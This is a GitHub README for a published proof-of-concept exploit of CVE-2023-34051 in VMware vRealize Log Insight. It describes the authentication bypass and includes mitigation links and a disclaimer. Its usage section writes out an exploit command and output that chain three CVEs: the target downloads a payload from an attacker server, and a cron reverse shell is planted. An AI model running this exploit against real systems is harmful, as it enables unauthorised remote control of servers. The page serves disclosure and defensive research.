Skip to content

horizon3ai/CVE-2023-34051

Repository files navigation

CVE-2023-34051

CVE-2023-34051 is an authentication bypass that bypasses the patch for VMSA-2023-0001. VMSA-2023-0001 for vRealize Log Insight includes the following CVEs:

  • VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706)
  • VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704)
  • VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)

The default configuration of this vulnerability writes a cron job to create a reverse shell. Be sure to change the payload file to suit your environment.

Technical Analysis

A technical root cause analysis of the vulnerability can be found on our blog: https://www.horizon3.ai/vmware-aria-operations-for-logs-cve-2023-34051-technical-deep-dive

Indicators of Compromise

For analyzing Log Insight instances for indicators of compromise check out our IOC blog: https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/

Summary

This POC abuses IP address spoofing and various Thrift RPC endpoints to achieve an arbitrary file write.

Usage

$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit 
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered

Troubleshooting

For this attack to work, an attacker must have the same IP address as a master /worker node. See blog above for more details.

If using a cron based payload, make sure the payload file has the appropriate permissions and owner:

sudo chown root:root payload
sudo chmod 0644 payload 

Mitigations

Update to the latest version or mitigate by following the instructions within the VMSA https://www.vmware.com/security/advisories/VMSA-2023-0021.html

Follow the Horizon3.ai Attack Team on Twitter for the latest security research:

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

About

VMware Aria Operations for Logs CVE-2023-34051

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published